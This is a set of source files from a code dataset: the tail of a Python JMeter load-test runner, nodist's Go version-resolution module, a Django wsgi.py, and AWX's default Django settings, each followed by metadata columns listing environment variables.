if not os.path.exists(cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE):
os.makedirs(cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE)
jmeter_results_file_path = cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE + \
'/' + scenario_id_value + "_" + cs.ARGUMENTS_JMETER_ROUND_ID_VALUE + ".jtl"
config_variables = ['-J' + cs.ARGUMENTS_JMETER_HTTP_HOST_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_HOST_VALUE,
'-J' + cs.ARGUMENTS_JMETER_HTTP_PORT_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_PORT_VALUE,
'-J' + cs.ARGUMENTS_JMETER_HTTP_PATH_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_PATH_VALUE,
'-J' + cs.ARGUMENTS_JMETER_NUMBER_THREADS_VAR + '=' + concurrent_users,
'-J' + cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VAR + '=' + thread_loop,
'-J' + cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VAR + '=' + thread_rampup,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VAR + '=' + workload_file_path,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_NUM_ROWS_VAR + '=' + workload_file_num_csv_rows,
'-J' + cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VAR + '=' + cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VALUE,
'-J' + cs.ARGUMENTS_JMETER_ROUND_ID_VAR + '=' + cs.ARGUMENTS_JMETER_ROUND_ID_VALUE,
'-J' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VAR + '=' + scenario_id_value,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VAR + "=" + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VALUE,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VAR + "=" + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VALUE]
jmeter_jar_path = [cs.CONFIG_JMETER_PATH_VALUE + '/bin/ApacheJMeter.jar']
env = dict(os.environ)
env['JAVA_OPTS'] = '-Xmx8192m -Xms1024m'
print "Starting Experiment with load " + scenario_id_value
subprocess.call(['java', '-jar'] + jmeter_jar_path + ['-n'] + config_variables + ['-t', jmeter_test_plan, '-l', jmeter_results_file_path], env=env)
print "Experiment Finished. Results in " + jmeter_results_file_path
count_workload_file_list += 1
# Aggregate the summary report files
# 1) Be able to process the results for each day. The output generated file must follow the same file naming property as the generated load
# 2) Extract Statistics, e.g. mean response time, mean number of errors
#with open('resources/arguments.properties.template') as fp:
# properties = jprops.load_properties(fp)
#x = {'y': '1', 'z': '2'}
#with open('out.properties', 'w') as fp:
# jprops.store_properties(fp, x)
#print properties
| [] | [] | [] | [] | [] | python | 0 | 0 | |
src/lib/nodist/nodist.go | package nodist
import (
"errors"
"os"
"io/ioutil"
"strings"
"sort"
"encoding/json"
"github.com/marcelklehr/semver"
)
import . "github.com/computes/go-debug"
var debug = Debug("nodist:shim")
const pathSep = string(os.PathSeparator)
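// GetCurrentNodeVersionSpec resolves the node version spec in precedence order: NODE_VERSION, NODIST_NODE_VERSION, the package.json engines field (when NODIST_INSPECT_PACKAGEJSON is set), the nearest .node-version file, then the global .node-version-global file.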
func GetCurrentNodeVersionSpec(currentDir string) (spec string) {
// Determine version spec
var v string
clever := os.Getenv("NODIST_INSPECT_PACKAGEJSON");
if v = os.Getenv("NODE_VERSION"); v != "" {
spec = v
debug("NODE_VERSION found:'%s'", spec)
} else
if v = os.Getenv("NODIST_NODE_VERSION"); v != "" {
spec = v
debug("NODIST_NODE_VERSION found:'%s'", spec)
} else
if v, err := getLocalEngineNode(currentDir); clever != "" && err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = v
debug("Target engine found:'%s'", spec)
} else
if v, localFile, err := getLocalNodeVersion(currentDir); err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = string(v)
debug("Local file found:'%s' @ %s", spec, localFile)
} else
if v, err := ioutil.ReadFile(os.Getenv("NODIST_PREFIX")+"\\.node-version-global"); err == nil {
spec = string(v)
debug("Global file found: '%s'", spec)
}
spec = strings.Trim(spec, "v \r\n")
return
}
func GetCurrentNpmVersionSpec(currentDir string) (spec string) {
// Determine version spec
var v string
clever := os.Getenv("NODIST_INSPECT_PACKAGEJSON");
if v = os.Getenv("NODIST_NPM_VERSION"); v != "" {
spec = v
debug("NODIST_NPM_VERSION found:'%s'", spec)
} else
if v, err := getLocalEngineNpm(currentDir); clever != "" && err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = v
debug("Target engine npm spec found:'%s'", spec)
} else
if v, localFile, err := getLocalNpmVersion(currentDir); err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = string(v)
debug("Local file with npm spec found:'%s' @ %s", spec, localFile)
} else
if v, err := ioutil.ReadFile(os.Getenv("NODIST_PREFIX")+"\\.npm-version-global"); err == nil {
spec = string(v)
debug("Global file found: '%s'", spec)
}
spec = strings.Trim(spec, "v \r\n")
return
}
func ResolveNodeVersion(spec string) (version string, err error){
// Find an installed version matching the spec...
installed, err := GetInstalledNodeVersions()
if err != nil {
return
}
version, err = resolveVersion(spec, installed)
return
}
func GetInstalledNodeVersions() (versions []*semver.Version, err error) {
// Determine architecture
x64 := false
if wantX64 := os.Getenv("NODIST_X64"); wantX64 != "" {
x64 = (wantX64 == "1")
}
// construct path to version dir
path := os.Getenv("NODIST_PREFIX")+"/v"
if x64 {
path += "-x64"
}
versions, err = getInstalledVersions(path)
return
}
func ResolveNpmVersion(spec string, nodeVersion string) (version string, err error){
// Find an installed version matching the spec...
installed, err := GetInstalledNpmVersions()
if err != nil {
return
}
if spec == "match" {
spec, err = getMatchingNpmVersion(nodeVersion)
if err != nil {
return
}
// we feed this result to resolveVersion, too, because we need
// to see if it is actually installed
}
version, err = resolveVersion(spec, installed)
return
}
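// resolveVersion returns the newest installed version satisfying the spec; "latest" picks the newest installed version outright.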
func resolveVersion(spec string, installed []*semver.Version) (version string, err error) {
var constraint *semver.Constraints
if spec != "latest" {
constraint, err = semver.NewConstraint(spec)
if err != nil {
return
}
}
if spec == "latest" {
version = installed[0].String()
}else{
for _, v := range installed {
debug("checking %s against %s", v.String(), spec)
if constraint.Check(v) {
version = v.String()
break
}
}
}
if version == "" {
err = errors.New("Couldn't find any matching version")
}
return
}
type Version struct {
Version string
Npm string
}
func getMatchingNpmVersion(nodeVersion string) (version string, err error) {
file := os.Getenv("NODIST_PREFIX")+pathSep+"versions.json"
rawJSON, err := ioutil.ReadFile(file)
if err != nil {
return
}
var versions []Version
err = json.Unmarshal(rawJSON, &versions)
if err != nil {
return
}
for i:=0; i < len(versions); i++ {
if versions[i].Version[1:] != nodeVersion {
continue
}
version = versions[i].Npm
return
}
err = errors.New("No npm version found that matches node version "+nodeVersion)
return
}
func GetInstalledNpmVersions() (versions []*semver.Version, err error) {
// construct path to version dir
path := os.Getenv("NODIST_PREFIX")+"/npmv"
versions, err = getInstalledVersions(path)
return
}
func getInstalledVersions(path string) (versions []*semver.Version, err error) {
entries, err := ioutil.ReadDir(path)
if err != nil {
return
}
versions = make([]*semver.Version, 0)
for _, entry := range entries {
if !entry.IsDir() {
continue
}
v, err := semver.NewVersion(entry.Name())
if err == nil {
versions = append(versions, v)
}
}
sort.Sort(sort.Reverse(semver.Collection(versions)))
return
}
func getLocalNodeVersion(dir string) (version string, file string, err error) {
version, file, err = getLocalVersion(dir, ".node-version")
return
}
func getLocalNpmVersion(dir string) (version string, file string, err error) {
version, file, err = getLocalVersion(dir, ".npm-version")
return
}
func getLocalVersion(dir string, filename string) (version string, file string, returnedError error) {
dirSlice := strings.Split(dir, pathSep) // D:\Programme\nodist => [D:, Programme, nodist]
for len(dirSlice) != 1 {
dir = strings.Join(dirSlice, pathSep)
file = dir+pathSep+filename
v, err := ioutil.ReadFile(file);
if err == nil {
version = string(v)
return
}
if !os.IsNotExist(err) {
returnedError = err // some other error.. bad luck.
return
}
// `$ cd ..`
dirSlice = dirSlice[:len(dirSlice)-1] // pop the last dir
}
version = ""
return
}
func getLocalEngineNode(dir string) (spec string, err error) {
packageJSON, err := getLocalPackageJSON(dir)
if err != nil {
return
}
spec = packageJSON.Engines.Node
return
}
func getLocalEngineNpm(dir string) (spec string, err error) {
packageJSON, err := getLocalPackageJSON(dir)
if err != nil {
return
}
spec = packageJSON.Engines.Npm
return
}
func getLocalPackageJSON(dir string) (packageJSON PackageJSON, returnedError error) {
debug("getTargetEngine: targetDir: %s", dir)
dirSlice := strings.Split(dir, pathSep) // D:\Programme\nodist => [D:, Programme, nodist]
for len(dirSlice) != 1 {
dir = strings.Join(dirSlice, pathSep)
file := dir+"\\package.json"
rawPackageJSON, err := ioutil.ReadFile(file);
debug("getTargetEngine: ReadFile %s", file)
if err == nil {
// no error handling for parsing, cause we don't want to use a different package.json if we've already found one
packageJSON, returnedError = parsePackageJSON(rawPackageJSON)
return
}
if !os.IsNotExist(err) {
returnedError = err // some other error.. bad luck.
return
}
// `$ cd ..`
dirSlice = dirSlice[:len(dirSlice)-1] // pop the last dir
}
return
}
type PackageJSON struct {
Engines struct {
Npm string
Node string
}
}
func parsePackageJSON(rawPackageJSON []byte) (packageJSON PackageJSON, err error) {
err = json.Unmarshal(rawPackageJSON, &packageJSON)
if err == nil {
debug("parsePackageJSON: %+v", packageJSON)
return
}
debug("parsePackageJSON: error: %s", err.Error())
// incorrect JSON -- bad luck
return
}
| ["\"NODIST_INSPECT_PACKAGEJSON\"", "\"NODE_VERSION\"", "\"NODIST_NODE_VERSION\"", "\"NODIST_PREFIX\"", "\"NODIST_INSPECT_PACKAGEJSON\"", "\"NODIST_NPM_VERSION\"", "\"NODIST_PREFIX\"", "\"NODIST_X64\"", "\"NODIST_PREFIX\"", "\"NODIST_PREFIX\"", "\"NODIST_PREFIX\""] | [] | ["NODIST_NPM_VERSION", "NODIST_NODE_VERSION", "NODIST_PREFIX", "NODIST_INSPECT_PACKAGEJSON", "NODE_VERSION", "NODIST_X64"] | [] | ["NODIST_NPM_VERSION", "NODIST_NODE_VERSION", "NODIST_PREFIX", "NODIST_INSPECT_PACKAGEJSON", "NODE_VERSION", "NODIST_X64"] | go | 6 | 0 | |
djorg/wsgi.py | """
WSGI config for djorg project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djorg.settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
awx/settings/defaults.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
import os
import re # noqa
import sys
from datetime import timedelta
# global settings
from django.conf import global_settings
# ugettext lazy
from django.utils.translation import ugettext_lazy as _
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
def is_testing(argv=None):
'''Return True if running django or py.test unit tests.'''
if 'PYTEST_CURRENT_TEST' in os.environ.keys():
return True
argv = sys.argv if argv is None else argv
if len(argv) >= 1 and ('py.test' in argv[0] or 'py/test.py' in argv[0]):
return True
elif len(argv) >= 2 and argv[1] == 'test':
return True
return False
def IS_TESTING(argv=None):
return is_testing(argv)
if "pytest" in sys.modules:
from unittest import mock
with mock.patch('__main__.__builtins__.dir', return_value=[]):
import ldap
else:
import ldap
DEBUG = True
SQL_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'awx.sqlite3'),
'ATOMIC_REQUESTS': True,
'TEST': {
# Test database cannot be :memory: for inventory tests.
'NAME': os.path.join(BASE_DIR, 'awx_test.sqlite3'),
},
}
}
AWX_CONTAINER_GROUP_K8S_API_TIMEOUT = 10
AWX_CONTAINER_GROUP_POD_LAUNCH_RETRIES = 100
AWX_CONTAINER_GROUP_POD_LAUNCH_RETRY_DELAY = 5
AWX_CONTAINER_GROUP_DEFAULT_NAMESPACE = 'default'
AWX_CONTAINER_GROUP_DEFAULT_IMAGE = 'ansible/ansible-runner'
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
#
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'ui', 'static'),
os.path.join(BASE_DIR, 'static'),
)
# Absolute filesystem path to the directory where static file are collected via
# the collectstatic command.
STATIC_ROOT = os.path.join(BASE_DIR, 'public', 'static')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(BASE_DIR, 'public', 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
LOGIN_URL = '/api/login/'
# Absolute filesystem path to the directory to host projects (with playbooks).
# This directory should not be web-accessible.
PROJECTS_ROOT = os.path.join(BASE_DIR, 'projects')
# Absolute filesystem path to the directory for job status stdout (default for
# development and tests, default for production defined in production.py). This
# directory should not be web-accessible
JOBOUTPUT_ROOT = os.path.join(BASE_DIR, 'job_output')
# Absolute filesystem path to the directory to store logs
LOG_ROOT = os.path.join(BASE_DIR)
# The heartbeat file for the tower scheduler
SCHEDULE_METADATA_LOCATION = os.path.join(BASE_DIR, '.tower_cycle')
# Django gettext files path: locale/<lang-code>/LC_MESSAGES/django.po, django.mo
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale'),
)
# Graph of resources that can have named-url
NAMED_URL_GRAPH = {}
# Maximum number of the same job that can be waiting to run when launching from scheduler
# Note: This setting may be overridden by database settings.
SCHEDULE_MAX_JOBS = 10
SITE_ID = 1
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'p7z7g1ql4%6+(6nlebb6hdk7sd^&fnjpal308%n%+p^_e6vo1y'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# HTTP headers and meta keys to search to determine remote host name or IP. Add
# additional items to this list, such as "HTTP_X_FORWARDED_FOR", if behind a
# reverse proxy.
REMOTE_HOST_HEADERS = ['REMOTE_ADDR', 'REMOTE_HOST']
# If Tower is behind a reverse proxy/load balancer, use this setting to
# whitelist the proxy IP addresses from which Tower should trust custom
# REMOTE_HOST_HEADERS header values
# REMOTE_HOST_HEADERS = ['HTTP_X_FORWARDED_FOR', ''REMOTE_ADDR', 'REMOTE_HOST']
# PROXY_IP_WHITELIST = ['10.0.1.100', '10.0.1.101']
# If this setting is an empty list (the default), the headers specified by
# REMOTE_HOST_HEADERS will be trusted unconditionally')
PROXY_IP_WHITELIST = []
CUSTOM_VENV_PATHS = []
# Note: This setting may be overridden by database settings.
STDOUT_MAX_BYTES_DISPLAY = 1048576
# Returned in the header on event api lists as a recommendation to the UI
# on how many events to display before truncating/hiding
MAX_UI_JOB_EVENTS = 4000
# Returned in index.html, tells the UI if it should make requests
# to update job data in response to status changes websocket events
UI_LIVE_UPDATES_ENABLED = True
# The maximum size of the ansible callback event's res data structure
# beyond this limit and the value will be removed
MAX_EVENT_RES_DATA = 700000
# Note: This setting may be overridden by database settings.
EVENT_STDOUT_MAX_BYTES_DISPLAY = 1024
# The amount of time before a stdout file is expired and removed locally
# Note that this can be recreated if the stdout is downloaded
LOCAL_STDOUT_EXPIRE_TIME = 2592000
# The number of processes spawned by the callback receiver to process job
# events into the database
JOB_EVENT_WORKERS = 4
# The maximum size of the job event worker queue before requests are blocked
JOB_EVENT_MAX_QUEUE_SIZE = 10000
# The number of job events to migrate per-transaction when moving from int -> bigint
JOB_EVENT_MIGRATION_CHUNK_SIZE = 1000000
# Disallow sending session cookies over insecure connections
SESSION_COOKIE_SECURE = True
# Seconds before sessions expire.
# Note: This setting may be overridden by database settings.
SESSION_COOKIE_AGE = 1800
# Maximum number of per-user valid, concurrent sessions.
# -1 is unlimited
# Note: This setting may be overridden by database settings.
SESSIONS_PER_USER = -1
CSRF_USE_SESSIONS = False
# Disallow sending csrf cookies over insecure connections
CSRF_COOKIE_SECURE = True
# Limit CSRF cookies to browser sessions
CSRF_COOKIE_AGE = None
TEMPLATES = [
{
'NAME': 'default',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'debug': DEBUG,
'context_processors': [# NOQA
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'awx.ui.context_processors.settings',
'awx.ui.context_processors.version',
'social_django.context_processors.backends',
'social_django.context_processors.login_redirect',
],
'loaders': [(
'django.template.loaders.cached.Loader',
('django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',),
)],
'builtins': ['awx.main.templatetags.swagger'],
},
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
},
]
ROOT_URLCONF = 'awx.urls'
WSGI_APPLICATION = 'awx.wsgi.application'
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'oauth2_provider',
'rest_framework',
'django_extensions',
'channels',
'polymorphic',
'taggit',
'social_django',
'corsheaders',
'awx.conf',
'awx.main',
'awx.api',
'awx.ui',
'awx.sso',
'solo'
]
INTERNAL_IPS = ('127.0.0.1',)
MAX_PAGE_SIZE = 200
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'awx.api.pagination.Pagination',
'PAGE_SIZE': 25,
'DEFAULT_AUTHENTICATION_CLASSES': (
'awx.api.authentication.LoggedOAuth2Authentication',
'awx.api.authentication.SessionAuthentication',
'awx.api.authentication.LoggedBasicAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'awx.api.permissions.ModelAccessPermission',
),
'DEFAULT_FILTER_BACKENDS': (
'awx.api.filters.TypeFilterBackend',
'awx.api.filters.FieldLookupBackend',
'rest_framework.filters.SearchFilter',
'awx.api.filters.OrderByBackend',
),
'DEFAULT_PARSER_CLASSES': (
'awx.api.parsers.JSONParser',
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'awx.api.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'awx.api.metadata.Metadata',
'EXCEPTION_HANDLER': 'awx.api.views.api_exception_handler',
'VIEW_DESCRIPTION_FUNCTION': 'awx.api.generics.get_view_description',
'NON_FIELD_ERRORS_KEY': '__all__',
'DEFAULT_VERSION': 'v2',
# For swagger schema generation
# see https://github.com/encode/django-rest-framework/pull/6532
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.AutoSchema',
#'URL_FORMAT_OVERRIDE': None,
}
AUTHENTICATION_BACKENDS = (
'awx.sso.backends.LDAPBackend',
'awx.sso.backends.LDAPBackend1',
'awx.sso.backends.LDAPBackend2',
'awx.sso.backends.LDAPBackend3',
'awx.sso.backends.LDAPBackend4',
'awx.sso.backends.LDAPBackend5',
'awx.sso.backends.RADIUSBackend',
'awx.sso.backends.TACACSPlusBackend',
'social_core.backends.google.GoogleOAuth2',
'social_core.backends.github.GithubOAuth2',
'social_core.backends.github.GithubOrganizationOAuth2',
'social_core.backends.github.GithubTeamOAuth2',
'social_core.backends.azuread.AzureADOAuth2',
'awx.sso.backends.SAMLAuth',
'django.contrib.auth.backends.ModelBackend',
)
# Django OAuth Toolkit settings
OAUTH2_PROVIDER_APPLICATION_MODEL = 'main.OAuth2Application'
OAUTH2_PROVIDER_ACCESS_TOKEN_MODEL = 'main.OAuth2AccessToken'
OAUTH2_PROVIDER_REFRESH_TOKEN_MODEL = 'oauth2_provider.RefreshToken'
OAUTH2_PROVIDER = {'ACCESS_TOKEN_EXPIRE_SECONDS': 31536000000,
'AUTHORIZATION_CODE_EXPIRE_SECONDS': 600,
'REFRESH_TOKEN_EXPIRE_SECONDS': 2628000}
ALLOW_OAUTH2_FOR_EXTERNAL_USERS = False
# LDAP server (default to None to skip using LDAP authentication).
# Note: This setting may be overridden by database settings.
AUTH_LDAP_SERVER_URI = None
# Disable LDAP referrals by default (to prevent certain LDAP queries from
# hanging with AD).
# Note: This setting may be overridden by database settings.
AUTH_LDAP_CONNECTION_OPTIONS = {
ldap.OPT_REFERRALS: 0,
ldap.OPT_NETWORK_TIMEOUT: 30
}
# Radius server settings (default to empty string to skip using Radius auth).
# Note: These settings may be overridden by database settings.
RADIUS_SERVER = ''
RADIUS_PORT = 1812
RADIUS_SECRET = ''
# TACACS+ settings (default host to empty string to skip using TACACS+ auth).
# Note: These settings may be overridden by database settings.
TACACSPLUS_HOST = ''
TACACSPLUS_PORT = 49
TACACSPLUS_SECRET = ''
TACACSPLUS_SESSION_TIMEOUT = 5
TACACSPLUS_AUTH_PROTOCOL = 'ascii'
# Enable / Disable HTTP Basic Authentication used in the API browser
# Note: Session limits are not enforced when using HTTP Basic Authentication.
# Note: This setting may be overridden by database settings.
AUTH_BASIC_ENABLED = True
# If set, specifies a URL that unauthenticated users will be redirected to
# when trying to access a UI page that requries authentication.
LOGIN_REDIRECT_OVERRIDE = ''
# If set, serve only minified JS for UI.
USE_MINIFIED_JS = False
# Default to skipping isolated host key checking (the initial connection will
# hang on an interactive "The authenticity of host example.org can't be
# established" message)
AWX_ISOLATED_HOST_KEY_CHECKING = False
# The number of seconds to sleep between status checks for jobs running on isolated nodes
AWX_ISOLATED_CHECK_INTERVAL = 30
# The timeout (in seconds) for launching jobs on isolated nodes
AWX_ISOLATED_LAUNCH_TIMEOUT = 600
# Ansible connection timeout (in seconds) for communicating with isolated instances
AWX_ISOLATED_CONNECTION_TIMEOUT = 10
# The time (in seconds) between the periodic isolated heartbeat status check
AWX_ISOLATED_PERIODIC_CHECK = 600
# Verbosity level for isolated node management tasks
AWX_ISOLATED_VERBOSITY = 0
# Memcached django cache configuration
# CACHES = {
# 'default': {
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'LOCATION': '127.0.0.1:11211',
# 'TIMEOUT': 864000,
# 'KEY_PREFIX': 'tower_dev',
# }
# }
DEVSERVER_DEFAULT_ADDR = '0.0.0.0'
DEVSERVER_DEFAULT_PORT = '8013'
# Set default ports for live server tests.
os.environ.setdefault('DJANGO_LIVE_TEST_SERVER_ADDRESS', 'localhost:9013-9199')
BROKER_DURABILITY = True
BROKER_POOL_LIMIT = None
BROKER_URL = 'unix:///var/run/redis/redis.sock'
BROKER_TRANSPORT_OPTIONS = {}
CELERYBEAT_SCHEDULE = {
'tower_scheduler': {
'task': 'awx.main.tasks.awx_periodic_scheduler',
'schedule': timedelta(seconds=30),
'options': {'expires': 20,}
},
'cluster_heartbeat': {
'task': 'awx.main.tasks.cluster_node_heartbeat',
'schedule': timedelta(seconds=60),
'options': {'expires': 50,}
},
'gather_analytics': {
'task': 'awx.main.tasks.gather_analytics',
'schedule': timedelta(minutes=5)
},
'task_manager': {
'task': 'awx.main.scheduler.tasks.run_task_manager',
'schedule': timedelta(seconds=20),
'options': {'expires': 20}
},
'k8s_reaper': {
'task': 'awx.main.tasks.awx_k8s_reaper',
'schedule': timedelta(seconds=60),
'options': {'expires': 50,}
},
# 'isolated_heartbeat': set up at the end of production.py and development.py
}
# Django Caching Configuration
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': 'memcached:11211',
},
}
# Social Auth configuration.
SOCIAL_AUTH_STRATEGY = 'social_django.strategy.DjangoStrategy'
SOCIAL_AUTH_STORAGE = 'social_django.models.DjangoStorage'
SOCIAL_AUTH_USER_MODEL = AUTH_USER_MODEL # noqa
_SOCIAL_AUTH_PIPELINE_BASE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'social_core.pipeline.user.get_username',
'social_core.pipeline.social_auth.associate_by_email',
'social_core.pipeline.user.create_user',
'awx.sso.pipeline.check_user_found_or_created',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.social_auth.load_extra_data',
'awx.sso.pipeline.set_is_active_for_new_user',
'social_core.pipeline.user.user_details',
'awx.sso.pipeline.prevent_inactive_login',
)
SOCIAL_AUTH_PIPELINE = _SOCIAL_AUTH_PIPELINE_BASE + (
'awx.sso.pipeline.update_user_orgs',
'awx.sso.pipeline.update_user_teams',
)
SOCIAL_AUTH_SAML_PIPELINE = _SOCIAL_AUTH_PIPELINE_BASE + (
'awx.sso.pipeline.update_user_orgs_by_saml_attr',
'awx.sso.pipeline.update_user_teams_by_saml_attr',
'awx.sso.pipeline.update_user_orgs',
'awx.sso.pipeline.update_user_teams',
)
SOCIAL_AUTH_LOGIN_URL = '/'
SOCIAL_AUTH_LOGIN_REDIRECT_URL = '/sso/complete/'
SOCIAL_AUTH_LOGIN_ERROR_URL = '/sso/error/'
SOCIAL_AUTH_INACTIVE_USER_URL = '/sso/inactive/'
SOCIAL_AUTH_RAISE_EXCEPTIONS = False
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = False
#SOCIAL_AUTH_SLUGIFY_USERNAMES = True
SOCIAL_AUTH_CLEAN_USERNAMES = True
SOCIAL_AUTH_SANITIZE_REDIRECTS = True
SOCIAL_AUTH_REDIRECT_IS_HTTPS = False
# Note: These settings may be overridden by database settings.
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = ''
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = ''
SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['profile']
SOCIAL_AUTH_GITHUB_KEY = ''
SOCIAL_AUTH_GITHUB_SECRET = ''
SOCIAL_AUTH_GITHUB_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_GITHUB_ORG_KEY = ''
SOCIAL_AUTH_GITHUB_ORG_SECRET = ''
SOCIAL_AUTH_GITHUB_ORG_NAME = ''
SOCIAL_AUTH_GITHUB_ORG_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_GITHUB_TEAM_KEY = ''
SOCIAL_AUTH_GITHUB_TEAM_SECRET = ''
SOCIAL_AUTH_GITHUB_TEAM_ID = ''
SOCIAL_AUTH_GITHUB_TEAM_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_AZUREAD_OAUTH2_KEY = ''
SOCIAL_AUTH_AZUREAD_OAUTH2_SECRET = ''
SOCIAL_AUTH_SAML_SP_ENTITY_ID = ''
SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = ''
SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = ''
SOCIAL_AUTH_SAML_ORG_INFO = {}
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {}
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {}
SOCIAL_AUTH_SAML_ENABLED_IDPS = {}
SOCIAL_AUTH_SAML_ORGANIZATION_ATTR = {}
SOCIAL_AUTH_SAML_TEAM_ATTR = {}
# Any ANSIBLE_* settings will be passed to the task runner subprocess
# environment
# We do not want AWX to ask interactive questions, and we want it to be
# friendly with reprovisioning
ANSIBLE_HOST_KEY_CHECKING = False
# RHEL ships an SSH that is too old, so ansible will select paramiko, and this
# is VERY slow.
ANSIBLE_PARAMIKO_RECORD_HOST_KEYS = False
# Force ansible in color even if we don't have a TTY so we can properly colorize
# output
ANSIBLE_FORCE_COLOR = True
# If parsing of the temporary generated inventory fails (error state), fail the playbook fast
ANSIBLE_INVENTORY_UNPARSED_FAILED = True
# Additional environment variables to be passed to the ansible subprocesses
AWX_TASK_ENV = {}
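# Illustrative example only (the key/value below are placeholders, not defaults):
# AWX_TASK_ENV = {'HTTP_PROXY': 'http://proxy.example.com:3128'}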
# Rebuild Host Smart Inventory memberships.
AWX_REBUILD_SMART_MEMBERSHIP = False
# By default, allow arbitrary Jinja templating in extra_vars defined on a Job Template
ALLOW_JINJA_IN_EXTRA_VARS = 'template'
# Run project updates with extra verbosity
PROJECT_UPDATE_VVV = False
# Enable dynamically pulling roles from a requirement.yml file
# when updating SCM projects
# Note: This setting may be overridden by database settings.
AWX_ROLES_ENABLED = True
# Enable dynamically pulling collections from a requirement.yml file
# when updating SCM projects
# Note: This setting may be overridden by database settings.
AWX_COLLECTIONS_ENABLED = True
# Settings for primary galaxy server, should be set in the UI
PRIMARY_GALAXY_URL = ''
